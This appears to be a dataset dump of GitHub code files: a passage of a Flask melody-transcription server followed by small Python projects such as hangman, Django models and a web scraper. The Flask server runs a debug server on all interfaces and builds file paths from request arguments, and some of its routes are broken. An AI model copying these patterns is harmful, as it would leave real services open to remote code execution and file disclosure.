scipy.signal.sosfilt(lowpass, stem)\n return filtered, original,sr1\n\n\ndef vocals_stem_definitions(path_to_vocals,path_to_orig):\n [stem,sr1] = librosa.load(path_to_vocals) #### path for vocals stem\n [original,sr2] = librosa.load(path_to_orig) #### path for whole song \n\n #highpass filter to remove extraneous signal noise\n highpass = scipy.signal.butter(2, 5000, 'highpass', fs=sr1, output='sos')\n filtered = scipy.signal.sosfilt(highpass, stem)\n return filtered, original,sr1\n\n\n#process single wav pyin\ndef process_video(videoid):\n \n base_fn = videoid \n #decode_fn = 'C:/Users/Duncan Hanson/Documents/GitHub/capstone2/static/stems/bass.wav'\n print(\"base_fn: \", base_fn)\n try:\n data,rate = librosa.load(base_fn)\n except Exception as bad_file:\n print(bad_file)\n return \"failure1\"\n \n melody = vamp.collect(data,rate,\"pyin:pyin\")\n parm = {}\n #plugin, step_size, block_size = vamp.load.load_and_configure(data, rate, \"mtg-melodia:melodiaviz\",parm)\n plugin, step_size, block_size = vamp.load.load_and_configure(data, rate, \"pyin:pyin\",parm)\n output_desc = plugin.get_output(5)\n print(\"od\",output_desc)\n output = output_desc[\"identifier\"]\n ff = vamp.frames.frames_from_array(data, step_size, block_size)\n results = vamp.process.process_with_initialised_plugin(ff, rate, step_size, plugin, [output])\n print(\"results:\", results)\n melody_tmp_fn = base_fn + \".lab\"\n print(\"melody_tmp: \", melody_tmp_fn)\n outfile = open(melody_tmp_fn,'w') \n try:\n result = next(results)\n except Exception as ex:\n print(\"failure2\",ex)\n return \"failure3\" \n\n while True:\n \n start = str(result['notes']['timestamp'])\n freq = result['notes']['values'][0]\n note_nbr = midi = str(round(69 + 12*np.log2(freq/440.)))\n duration = str(result['notes']['duration']) \n if result['notes']['values'].shape[0] > 1:\n print(\"multiple notes\",videoid)\n outfile.write(start + '\\t' + duration + '\\t' + note_nbr + '\\n')\n #print(\"??\",start + '\\t' + duration + '\\t' + note_nbr + '\\n')\n try:\n \n result = next(results) \n \n except:\n #outfile.write(start + '\\t' + duration + '\\t' + note_nbr )\n break\n \n outfile.close()\n\n\n #infile = melody_tmp_fn\n #melody_fn = base_fn + '.lab' \n #audio_to_midi_melodia(infile, melody_fn, 95)\n \n \n return melody_tmp_fn\n\n\n#convert pyin to midi\ndef convert_to_midi(note_matrix):\n song1 = pretty_midi.PrettyMIDI()\n # Create an Instrument instance for a cello instrument\n song1_program = pretty_midi.instrument_name_to_program('Acoustic Grand Piano')\n piano = pretty_midi.Instrument(program=song1_program)\n for row in note_matrix:\n song_id = row[0]\n note_number = int(row[3])\n start_time = float(row[1])\n end_time = float(row[2])\n note = pretty_midi.Note(velocity=100, pitch=note_number, start=start_time, end=end_time)\n piano.notes.append(note)\n song1.instruments.append(piano)\n # Write out the MIDI data\n song1.write(song_id + '_midi.mid')\n\n return 'success'\n\n#Get song data and beat tracker\ndef get_song_data(track_id,videoid):\n \n print(\"song_id \",track_id)\n base_fn = videoid\n ###### Figure out the name of the file to open based on the track_id supplied\n fn = track_id\n transcription_file = open(fn)\n pitch_vector=[]\n midipitches = ['C','C#','D','Eb','E','F','F#','G','G#','A','Bb','B']\n for row in transcription_file.readlines():\n row = row.split('\\t')\n start_time = float(row[0].strip(\" \"))\n end_time = start_time + float(row[1].strip(\" \"))\n duration = end_time - start_time\n note_nbr = int(row[2].strip(\"\\n\"))\n pcname = midipitches[note_nbr % 12]\n octave = int((note_nbr / 12) + 1)\n pitch_vector.append([start_time,duration,note_nbr,pcname,octave])\n pitchdf = pd.DataFrame(pitch_vector,columns=['start','duration','notenbr','pcname','octave'])\n \n\n beat_vector = []\n nbrbeats = 0\n\n ######need to implement madmom beat tracker to get bpm\n ######read beat tracker file to get beats \n\n #beat_fn = './capstone2/madmombeats/' + videoid.replace(\"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water\", \"\") + '.lab'\n proc = DBNDownBeatTrackingProcessor(beats_per_bar=[3,4], fps=100)\n act = RNNDownBeatProcessor()(base_fn)\n beatarray = proc(act) \n print(\"out \",beatarray)\n #outfile = open(beat_fn,'w')\n x = 0\n firststart = 0\n\n #for c in beatarray:\n #if x == 0:\n #firststart = c[0]\n #x += 1\n #continue\n #outfile.write(str(np.round(firststart,2)))\n #outfile.write('\\t')\n #firststart = c[0]\n #outfile.write(str(np.round(c[0],2)))\n #outfile.write('\\t')\n #outfile.write(str(np.round(c[1],2)))\n # outfile.write('\\t')\n\n #if x < len(beatarray) -1:\n # outfile.write('\\n')\n # x += 1\n # outfile.close()\n\n \n previous_start = 0\n for row in range(len(beatarray)):\n if row == 0:\n previous_start = float(beatarray[row][0])\n beat_vector.append([float(beatarray[row][0]),float(0),beatarray[row][1],'beat'])\n nbrbeats += 1\n else:\n previous_start = float(beatarray[row-1][0])\n beat_vector.append([float(beatarray[row][0]),float(beatarray[row][0])-previous_start,beatarray[row][1],'beat'])\n nbrbeats += 1\n\n beatdf = pd.DataFrame(beat_vector,columns=['start','duration','metric_pos','type'])\n beatdf['duration'].fillna(value=beatdf.duration.mean)\n songlen = beatdf.start.max() + beatdf.duration.iloc[beatdf.start.idxmax()]\n bpm = nbrbeats / (songlen / 60) \n print(\"songlen \", songlen, bpm)\n \n meanbeat = beatdf['duration'].mean()/4 ##### divide beat into sixteenth notes\n pitchdf['notelen'] = np.ceil(pitchdf['duration'] / meanbeat).astype(int).astype(str) + \"n\"\n pitchdf['16s'] = np.round(pitchdf['start'] / meanbeat)\n pitchdf['notestart'] = np.floor(np.round(pitchdf.start / meanbeat) / 16).astype(int)\n pitchdf['notestart4'] = (np.floor(np.round(pitchdf.start / meanbeat) - (pitchdf.notestart) * 16) / 4).astype(int)\n pitchdf['notestart16'] = (np.round(pitchdf.start / meanbeat) - ((pitchdf.notestart * 16) + (pitchdf.notestart4 * 4 ))).astype(int)\n pitchdf['notestartarray'] = pitchdf['notestart'].map(str) + \":\" + pitchdf['notestart4'].map(str) + \":\" + pitchdf['notestart16'].map(str)\n pitchdf['notename'] = pitchdf['pcname'] + pitchdf['octave'].map(str)\n notearray = pitchdf[['notestartarray','notename','notelen']].to_numpy()\n pitchdf['notearray'] = notearray.tolist()\n print(\"nnn\",pitchdf[['notearray','duration','notelen']].head(10))\n pitchdf.to_json(base_fn + \"_pitchdf.json\")\n print (pitchdf)\n return pitchdf, bpm\n\n\n#if __name__ == '__main__':\n \n #outputpath = separate_stems(UPLOAD_FOLDER,)\n #target_wav = bass_stem_definitions(outputpath,path_to_orig)\n target_wav = 'bass.wav'\n rc = process_video(target_wav)\n print(\"rc\",rc,target_wav)\n\n# if __name__ == \"__main__\":\n# fn = 'C:/Users/Duncan Hanson/Documents/GitHub/capstone2/pyin/basslemon.wav.lab'\n# transcription_file = open(fn)\n# note_matrix = []\n# for row in transcription_file.readlines():\n# row = row.split('\\t')\n# song_id = 'bass'\n# start_time = float(row[0].strip(\" \"))\n# end_time = start_time + float(row[1].strip(\" \"))\n# note_nbr = int(row[2].strip(\"\\n\"))\n# note_matrix.append([song_id,' ',start_time,end_time,note_nbr])\n# # convert_to_midi(note_matrix)\n\n\n@app.route('/audio_file_name')\ndef returnAudioFile(filePath):\n path_to_audio_file = filePath\n return send_file(\n path_to_audio_file, \n mimetype=\"audio/wav\", \n as_attachment=True, \n attachment_filename=\"test.wav\")\n\n@app.route('/upload')\ndef audio_upload():\n return render_template('upload.html')\n\n@app.route(\"/\")\ndef landing_load():\n return render_template(\"melody-editor.html\")\n\n@app.route('/explore')\ndef explore():\n ytid = request.args.get('ytid')\n if ytid == None:\n return render_template('melody-editor.html')\n else:\n return render_template('melody-editor.html',ytid=ytid)\n #return render_template('pixi-explore.html')\n\n@app.route('/get_song',methods=['GET', 'POST'])\ndef create_time_series():\n song_id = request.args.get('song_id')\n song_title = request.args.get('title')\n chord_type = request.args.get('chord_type')\n midi_id = request.args.get('midi_id')\n print(\"midi id \",midi_id)\n songtitles,titleoptions = refresh_song_titles()\n if song_id == None: \n print(\"using title\")\n track_id=songtitles.loc[songtitles.loc[:,'Title']==song_title,'ChordinoFN'].values[0]\n else:\n track_id=songtitles.loc[songtitles.loc[:,'YoutubeID']==song_id,'ChordinoFN'].values[0]\n userid = request.args.get('userid')\n pitchdf,chorddf,secdf,songlen,bpm,beatdf,chordlist = get_song_data(track_id,chord_type,userid,midi_id)\n #firstdownbeat,signature,nbr_sixteenths = get_downbeat(beatdf,chordlist)\n beatlist = beatdf.start.tolist()\n nbr_rows = math.ceil(float(len(beatlist)) / (nbr_sixteenths))\n lyric_lines,lyricdf = get_lyrics(song_id,beatlist,nbr_rows,signature,beatdf)\n #print(\"ldf\",lyricdf)\n lyricl = lyricdf.to_dict(orient='records')\n # if firstdownbeat > 0:\n # emptybeats = [\" \" for i in range(signature - firstdownbeat)]\n # chordlist = emptybeats + chordlist\n # print(\"empty\",emptybeats)\n print(\"cdf\",pitchdf['notearray'].head())\n cdictlist = []\n notelist = pitchdf['notearray'].tolist()\n chord_tone_array = []\n note_index = 0\n note_beat_measure = (int(notelist[note_index][0].split(':')[0]) * signature) + (int(notelist[note_index][0].split(':')[1]))\n \n \n #print(\"chordl\",chordl)\n pitchl = pitchdf.to_dict(orient='records')\n secl = secdf.to_dict(orient='records')\n #print(\"secl \",secl)\n D = {'data1' : pitchl, 'songlen' : songlen, 'bpm' : bpm,\n 'downbeat': str(firstdownbeat), 'signature': str(signature),'lyrics': lyricl,'cta' : chord_tone_array}\n \n return jsonify(D)\n\n\n@app.route(\"/edu\")\ndef edu():\n return render_template(\"edu.html\")\n\n\n\n@app.route('/')\ndef serve_static(filename):\n print('serving static')\n root_dir = app.root_path\n print(\"root \",root_dir,app.root_path,app.instance_path)\n filedir = os.path.join(root_dir, 'static/')\n print(filedir,filename)\n return send_from_directory(os.path.join(root_dir, 'static/'), filename)\n\n\n# @app.route('/play_audio')\n# def play_audio():\n# return render_template('play_audio.html')\n\n@app.route('/save_melody',methods=['GET','POST'])\ndef save_melody():\n request_data = request.get_json(silent = True)\n print(\"requestdata: \",request_data)\n melody_data = request_data[\"melody_data\"]\n song_id = request_data[\"song_id\"]\n print(\"songid:\", song_id)\n note_matrix = []\n for x in range(len(melody_data)):\n end_time = melody_data[x][0] + melody_data[x][1]\n note_nbr = melody_data[x][2]\n note_matrix.append([song_id,melody_data[x][0],end_time,note_nbr])\n convert_to_midi(note_matrix)\n return \"success\"\n\n\n@app.route('/save_audio',methods=['GET','POST'])\ndef save_audio():\n print(\"request title\", request.args.get(\"title\"))\n print(\"request type\", request.args.get(\"type\"))\n file_name = request.args.get(\"title\")\n type = request.args.get(\"type\")\n print(\"filename\", file_name)\n print(\"type\", type)\n\n if file_name != None:\n # this saves audio files into the \"audio_uploads\" folder. we will need to delete these in a cache on the webhosting possibly but for now it works fine\n #audio_file = request.files['audio']\n #print('audiofile: ', audio_file.filename)\n #print('newaudiofile: ', audio_file.filename.replace(\" \",\"_\").replace(\".\",\"_\",audio_file.filename.count(\".\")-1))\n\n #file_id=audio_file.filename.replace(\" \",\"_\").replace(\".\",\"_\",audio_file.filename.count(\".\")-1)\n #print(\"fileid\", file_id)\n # file_path = UPLOAD_FOLDER + \"/\" + file_id\n # output_path = STEMS_FOLDER + \"/\" + file_id\n #orig_file_path = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/static/audio_uploads/\"+ file_name + \".wav\"\n \n\n #print(\"file path: \", orig_file_path)\n #print(\"output path\", output_path)\n #audio_file.save(orig_file_path) \n\n # convert file to wav for future use\n\n #orig_file_path = '\"' + orig_file_path + '\"'\n\n #output_path = separate_stems(orig_file_path, file_id)\n #output_path = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water/other.wav\"\n\n #if \".mp3\" in orig_file_path:\n # print('yes there is mp3 here')\n # sound = AudioSegment.from_mp3(orig_file_path)\n # sound.export(orig_file_path.replace(\".mp3\",\".wav\"), format=\"wav\")\n # file_id = file_id.replace(\".mp3\",\".wav\")\n # orig_file_path = orig_file_path.replace(\".mp3\",\".wav\")\n\n #melody_fn = process_video(output_path)\n #melody_fn = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water/other.wav.lab\"\n\n #pitch_df,bpm = get_song_data(melody_fn,output_path)\n pitch_df = pd.read_json(\"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/processed/pitchdf/\" + file_name + \"/\" + type + \".wav_pitchdf.json\")\n \n bpm = pitch_df.bpm.mean()\n print(\"bpm: \", bpm)\n\n #name_of_file=file_id.split(\".\")[0]\n #bass_path = 'separated/mdx_q/'+ name_of_file + '/bass.wav'\n #vocals_path = 'separated/mdx_q/'+ name_of_file + '/vocals.wav'\n\n #stereo,sr=binauralizer(alpha,high,bass_path,orig_file_path)\n #binauralized_file_path = 'static/binauralized/' + file_id\n #write(binauralized_file_path,sr,stereo)\n #print(binauralized_file_path)\n pitchl = pitch_df.to_dict(orient='records')\n D = {'data1' : pitchl, 'bpm' : bpm }\n #return render_template('melody-editor.html', ytid=D) \n return jsonify(D) \n \n\n \n # return render_template('play_audio.html', file_path=binauralized_file_path)\n\n\n#testcase \n#process_video(path_to_bass)\n#write(\"stereo.wav\",sr,stereo)\n\n\n\nif __name__ == '__main__':\n #app = Flask(__name__)\n #sess = Session()\n dev_mode = 'TRUE'\n if dev_mode == 'TRUE':\n app.run(host='0.0.0.0',port=8100,debug=True)\n else:\n app.run()\n \n\n\n \n\n \n","repo_name":"dhanson007/MidiMelodyTranscriber","sub_path":"song_upload_server.py","file_name":"song_upload_server.py","file_ext":"py","file_size_in_byte":17683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"26663837310","text":"import random\nfrom wordlist import words\nimport string\nimport hangmangraphics\nimport time\nimport sys\n\ndef get_valid_word(words):\n word = random.choice(words)\n while '-' in word or ' ' in word:\n word = random.choice(words)\n return word\n\ndef hangman():\n word = get_valid_word(words).upper()\n word_letters = set(word)\n alphabet = set(string.ascii_uppercase)\n used_letters = set()\n lives = 6\n hangmangraphics.draw_hangman(lives) \n while len(word_letters) > 0 and lives > 0:\n print('You have',lives,' lives and You have used these letters', ' '.join(used_letters))\n\n word_list = [letter if letter in used_letters else '-' for letter in word]\n print('Current word: ', ' '.join(word_list))\n\n user_letter = input('Guess a letter: ').upper()\n if user_letter in alphabet - used_letters:\n used_letters.add(user_letter)\n if user_letter in word_letters:\n word_letters.remove(user_letter)\n else:\n lives = lives - 1\n hangmangraphics.draw_hangman(lives)\n print('this letter is not in the word')\n\n\n elif user_letter in used_letters:\n print('You have used that character before')\n\n else: \n print(\"invalid character, try again\")\n \n if lives == 0:\n print('You didnt guess the word, it was: ',word)\n else:\n print('You guessed it, the word is: ',word,'!')\n\nhangman()\ntime.sleep(5)\nprint(\"Press any key to exit the program\")\ninput()\nexit()","repo_name":"HyperDarkmoon/Hangman-python","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27569845367","text":"from django.db import models\nfrom account.models import AccountUser, WorkPlace\nfrom django.urls import reverse\nfrom django.template.defaultfilters import slugify\n\nstatus = (\n ('ass', 'Assigned'),\n ('prog', 'In Progress'),\n ('comp', 'Completed'),\n ('test', 'Testing'),\n ('rev', 'Review'),\n ('appr', 'Approved'),\n ('rel', 'Released')\n)\n\n# Create your models here.\n\nclass Project(models.Model):\n workplace_id = models.ForeignKey(WorkPlace, on_delete=models.CASCADE)\n project_manager = models.ForeignKey(AccountUser, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=255)\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n slug = models.SlugField(null=False, unique=True)\n\n def __str__(self):\n return self.name\n\n def assigned(self):\n var = Status.objects.get(status='ass')\n return self.tasks_set.filter(status_id_id=var)\n\n def progress(self):\n var = Status.objects.get(status='prog')\n return self.tasks_set.filter(status_id_id=var)\n\n def completed(self):\n var = Status.objects.get(status='comp')\n return self.tasks_set.filter(status_id_id=var)\n\n def testing(self):\n var = Status.objects.get(status='test')\n return self.tasks_set.filter(status_id_id=var)\n\n def review(self):\n var = Status.objects.get(status='rev')\n return self.tasks_set.filter(status_id_id=var)\n\n def approved(self):\n var = Status.objects.get(status='appr')\n return self.tasks_set.filter(status_id_id=var)\n\n def released(self):\n var = Status.objects.get(status='rel')\n return self.tasks_set.filter(status_id_id=var)\n\n def get_absolute_url(self):\n return reverse('projects:project-detail', kwargs={'workplace_id': self.workplace_id, 'slug': self.slug})\n\n def save(self, *args, **kwargs): # new\n if not self.slug:\n self.slug = slugify(self.name)\n return super().save(*args, **kwargs)\n\n\nclass Status(models.Model):\n status = models.CharField(max_length=15, choices=status, null=True, blank=True)\n\n def __str__(self):\n return self.status\n\n\nclass Tasks(models.Model):\n project_id = models.ForeignKey(Project, on_delete=models.CASCADE)\n user_id = models.ForeignKey(AccountUser, on_delete=models.SET_NULL, null=True)\n status_id = models.ForeignKey(Status, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=256)\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n\nclass Logs(models.Model):\n task_id = models.ForeignKey(Tasks, on_delete=models.CASCADE)\n messages = models.TextField()\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n\n def __str__(self):\n return self.messages\n","repo_name":"Akoh1/project-management","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27259978802","text":"from collections import defaultdict\nfrom graph import Graph\nimport os\nd = defaultdict(list)\nV, E = [int(x) for x in input('Nhập số đỉnh và cạnh trên một dòng:').split()]\nfor i in range(V):\n d[i] = []\ngraph = Graph(d)\nedges = []\nfor i in range(E):\n\n u, w = [int(x) for x in input('Nhập cạnh %d trên một dòng:' %(i+1)).split()]\n graph.graph[u - 1].append(w - 1)\n graph.graph[w - 1].append(u - 1)\n edge = [u, w]\n edges.append(edge)\n\nout = dict(zip(range(V), [0]*V))\nlayers = graph.bfs(0)\nis_even = 0\ncolors = [0, 1]\n\nfor i in layers:\n for ii in i:\n out[ii] = 1*is_even\n is_even = 1-is_even\nfor v in range(V):\n temp_colors = colors.copy()\n for next_v in graph.graph[v]:\n try:\n temp_colors.remove(out[next_v])\n except ValueError:\n pass\n if len(temp_colors) == 0:\n out[v] = colors[-1] + 1\n colors.append(out[v])\ncolors_list = ['black', 'red', 'blue', 'yellow', 'green', 'white', 'pink', 'ivory', 'gray', 'cyan', 'gold', 'tan', 'brown', 'orange', 'coral', 'maroon']\ntry:\n os.remove('dothitomau.dot')\nexcept FileNotFoundError:\n pass\nf = open('dothitomau.dot', 'w+')\nf.write('graph dothi\\n{\\n')\nfor i in range(V):\n f.write('%d [fillcolor=%s, style=filled];\\n' % (i+1, colors_list[out[i]]))\nfor i in edges:\n f.write('%d -- %d;\\n' % (i[0], i[1]))\nf.write('}')\nf.close()\n\n\n\n\n","repo_name":"catShaark/b-a-i-t-a-p-t-o-a-n-r-o-i-r-a-c","sub_path":"coloring.py","file_name":"coloring.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70751813172","text":"class WordDistance:\n\n def __init__(self, wordsDict: List[str]):\n self.dic=defaultdict(list)\n for i, w in enumerate(wordsDict):\n self.dic[w].append(i)\n\n def shortest(self, word1: str, word2: str) -> int:\n list1,list2=self.dic[word1],self.dic[word2]\n i=j=0\n res=math.inf\n while i 80:\n hasil = 'A'\nelif nilai <= 80 and nilai >= 76:\n hasil = 'AB'\nelif nilai <= 75 and nilai >= 71:\n hasil = 'B'\nelif nilai <= 70 and nilai >= 66:\n hasil = 'BC'\nelif nilai <=65 and nilai >= 56:\n hasil = 'C'\nelif nilai <=55 and nilai >= 51:\n hasil = 'CD'\nelif nilai <=50 and nilai > 45:\n hasil = 'D'\nelif nilai <=45 and nilai >= 41:\n hasil = 'ED'\nelif nilai <=40 and nilai >= 0:\n hasil = 'E'\nelse:\n print('Masukkan angka dibawah 100 saja!!!')\n \nprint('Nilai {} = {}'.format(nilai, hasil))\n\n","repo_name":"WebsiteThufail/kelola-angka","sub_path":"212410101082_M.Rafi Thufail_konversi_nilai.py","file_name":"212410101082_M.Rafi Thufail_konversi_nilai.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"14036866930","text":"import socket\n\nclass Client():\n def __init__(self, host, port):\n self._HOST = host\n self._PORT = port\n \n def send(self, msg):\n self.__client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.__client.connect((self._HOST, self._PORT))\n message = msg.encode()\n self.__client.send(message) # Send message to server\n response = self.__client.recv(1024).decode()\n self.__client.close()\n return response\n","repo_name":"OtavioFSantos/email-protocol","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39757116236","text":"# read input as list of starting sequences\r\ninp = [[int(x) for x in line.strip().split(',')] for line in open('input.txt')]\r\n\r\n\r\ndef rambunctious_recitation(seq, end):\r\n # first n-1 starting numbers append into dict\r\n # the number itself is a key, turn is a value\r\n spoken_nums = {n:turn+1 for turn,n in enumerate(seq[:-1])}\r\n # n-th starting number\r\n spoken = seq[-1]\r\n for turn in range(len(spoken_nums)+1, end):\r\n # if spoken number is not in a set of spoken numbers\r\n if spoken not in spoken_nums:\r\n # add a number into the set\r\n spoken_nums[spoken] = turn\r\n # the next spoken number is 0\r\n spoken = 0\r\n # else spoken number is already in spoken numbers\r\n else:\r\n most_recently_turn = spoken_nums[spoken]\r\n # update turn for a given number\r\n spoken_nums[spoken] = turn\r\n # the next spoken number will be 'age'\r\n # (the time a number was most recently spoken\r\n # before)\r\n spoken = turn - most_recently_turn\r\n return spoken\r\n\r\n\r\n# part 1\r\nprint(\"2020th number spoken in rambunctious recitation game:\")\r\nfor seq in inp:\r\n print(f'\\t{seq} -->', rambunctious_recitation(seq, 2020))\r\nprint()\r\n\r\n# part 2\r\nprint(\"30000000th number spoken in rambunctious recitation game:\")\r\nfor seq in inp:\r\n print(f'\\t{seq} -->', rambunctious_recitation(seq, 30000000))\r\nprint()\r\n","repo_name":"matusjokay/adventofcode","sub_path":"2020/15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"4313614544","text":"import argparse\nimport glob\nimport json\n\n\ndef create_jsonl_file(input_dir, output_dir):\n # Initialize an empty list to store the dictionaries\n data = []\n\n # Get a list of all the .txt files in the input directory\n txt_files = glob.glob(f\"{input_dir}/*.txt\")\n\n # Loop through each file and extract the data\n for txt_file in txt_files:\n # Open the file and read the lines\n with open(txt_file, \"r\") as f:\n lines = f.readlines()\n\n # Extract the conversation lines by removing the *Action* lines\n conversation = []\n for line in lines:\n if \"*Action*\" not in line:\n conversation.append(line.strip())\n\n # Combine the conversation lines into a single string\n conversation_str = \"\\n\".join(conversation)\n\n # Create a dictionary with the conversation string as the input and an empty output and a reward of 1.0\n data_dict = {\"input\": conversation_str, \"output\": \"\", \"reward\": 1.0}\n\n # Add the dictionary to the data list\n data.append(data_dict)\n\n # Write the data list to a jsonl file\n with open(f\"{output_dir}/output.jsonl\", \"w\") as f:\n for data_dict in data:\n # Remove any lines that start with the = sign in the output\n output_lines = data_dict[\"output\"].split(\"\\n\")\n output_lines = [line for line in output_lines if not line.startswith(\"=\")]\n output_str = \"\\n\".join(output_lines)\n\n # Update the data dictionary with the cleaned output\n data_dict[\"output\"] = output_str\n\n # Write the updated dictionary to the file\n json.dump(data_dict, f)\n f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Organize training data for Pyg-style chat models.\")\n parser.add_argument(\"--input\", type=str, help=\"Input directory containing .txt files.\")\n parser.add_argument(\"--output\", type=str, help=\"Output directory to write output.jsonl file to.\")\n args = parser.parse_args()\n\n create_jsonl_file(args.input, args.output)\n","repo_name":"AlpinDale/VNParser","sub_path":"tools/data-parser.py","file_name":"data-parser.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"21511688299","text":"# -*- coding: utf-8 -*-\nfrom retrying import retry\nimport requests\nfrom requests.exceptions import ConnectionError, ConnectTimeout, ReadTimeout\nfrom fake_useragent import UserAgent\n\nheader = {\"User-Agent\": UserAgent().random}\n\n\ndef downloader(url, method, data=None, headers={}, proxies=None, retry_times=10):\n \"\"\"\n 通用下载器\n :param url: url\n :param method: 请求方法,只支持get跟post\n :param data: post表单参数\n :param proxies: 代理\n :param retry_times: 重试次数\n :return: 响应结果\n \"\"\"\n headers = dict(header, **headers)\n while retry_times > 0:\n try:\n if method == 'GET':\n if proxies:\n res = requests.get(url=url, headers=headers, proxies=proxies, timeout=30)\n else:\n res = requests.get(url=url, headers=headers, timeout=30)\n else:\n if proxies:\n res = requests.post(url=url, data=data, headers=headers, proxies=proxies, timeout=30)\n else:\n res = requests.post(url=url, data=data, headers=headers, timeout=30)\n if res.status_code in [200, 201, 202]:\n return res.text\n except (ConnectTimeout, ReadTimeout, ConnectionError):\n print(\"抓取失败\", url)\n return None\n except Exception as e:\n print(f'请求出错:{repr(e)}--开始重试')\n if retry_times > 0:\n retry_times -= 1\n\n\n@retry(stop_max_attempt_number=8)\ndef downloader_old(url, method, data=None, options={}):\n \"\"\"\n 通用下载器,只处理get跟post请求\n :param url:\n :param method:\n :param data:\n :param proxies:\n :return:\n \"\"\"\n headers = dict(header, **options)\n while True:\n try:\n if method == 'GET':\n response = requests.get(url=url, headers=headers, timeout=10)\n if response.status_code in [200, 201, 202]:\n return response.text\n else:\n response = requests.post(url=url, headers=headers, data=data, timeout=10)\n if response.status_code in [200, 201, 202]:\n return response.text\n except (ConnectTimeout, ReadTimeout, ConnectionError):\n print(\"抓取失败\", url)\n return None\n except Exception as e:\n print(e.args)","repo_name":"pythonyhd/proxy_pool","sub_path":"proxypool/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"}
+{"seq_id":"40793196816","text":"import timeit\n\nimport numpy as np\nimport pandas as pd\nfrom ranking_util import basestuff, TwoD\nfrom necklace_split_binary import necklace_split\nfrom copy import deepcopy\n\n\ndef hybrid(path, sens_attr, columns, number_of_buckets):\n G = list(pd.read_csv(path)[sens_attr].values)\n n = len(G)\n basestuff.read_file(file=path, columns=columns)\n TwoD.initialize()\n number_of_cuts = []\n boundary_indices = []\n boundaries = []\n hash_buckets = []\n Theta = []\n swap_index = []\n start = timeit.default_timer()\n for i in range(n * n):\n r_, j, theta = TwoD.GetNext()\n r = deepcopy(r_)\n if r is not None and j != -1:\n idx1 = r[j]\n idx2 = r[j + 1]\n if i == 0 or (idx2 in boundary_indices and G[idx1] != G[idx2]):\n F = necklace_split(\n path, columns, sens_attr, number_of_buckets, r, theta\n )\n boundary_indices = F[0]\n boundaries.append(F[1])\n hash_buckets.append((F[2]))\n number_of_cuts.append(len(F[1]))\n Theta.append(theta)\n swap_index.append(j)\n elif r is not None and j == -1:\n F = necklace_split(path, columns, sens_attr, number_of_buckets, r, theta)\n boundary_indices = F[0]\n boundaries.append(F[1])\n hash_buckets.append((F[2]))\n number_of_cuts.append(len(F[1]))\n Theta.append(theta)\n swap_index.append(j)\n else:\n break\n stop = timeit.default_timer()\n return (\n number_of_cuts[np.argmin(number_of_cuts)],\n boundaries[np.argmin(number_of_cuts)],\n hash_buckets[np.argmin(number_of_cuts)],\n Theta[np.argmin(number_of_cuts)],\n stop - start,\n swap_index\n )\n","repo_name":"UIC-InDeXLab/fairHashmap","sub_path":"hybrid.py","file_name":"hybrid.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30904062621","text":"import unittest\nimport os\nimport sys\nimport filecmp\nimport pdb\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom pre_processing import metric_pre_processing as mpp\n\nclass MetricPreProcessingTest(unittest.TestCase):\n def test_add_rows(self):\n row1 = ['2019-11-25 15:58:59 CEST', '16.0', '11200000000', '8', '1.99', '1.94', '2.13']\n row2 = ['2019-11-25 15:58:59 CEST', '14.0', '11400000000', '8', '2.01', '1.96', '2.15']\n expected_result = ['2019-11-25 15:58:59 CEST', 30.0, 22600000000.0, 16.0, 4.0, 3.9, 4.28]\n\n self.assertEqual(expected_result, mpp._add_rows(row1, row2))\n\n def test_get_average_for_row(self):\n row = ['2019-11-25 15:58:59 CEST', 30.0, 22600000000.0, 16.0, 4.0, 3.9, 4.28]\n expected_result = [\n '2019-11-25 15:58:59 CEST',\n '15.0',\n '11300000000.0',\n '8.0',\n '2.0',\n '1.95',\n '2.14']\n\n self.assertEqual(expected_result, mpp._get_average_for_row(row, 2))\n\n def test_get_average_for_row_with_strings_as_elements(self):\n row = ['2019-11-25 15:58:59 CEST', '15.0', '11300000000.0', '8.0', '2.0', '1.95', '2.14']\n expected_result = [\n '2019-11-25 15:58:59 CEST',\n '15.0',\n '11300000000.0',\n '8.0',\n '2.0',\n '1.95',\n '2.14']\n\n 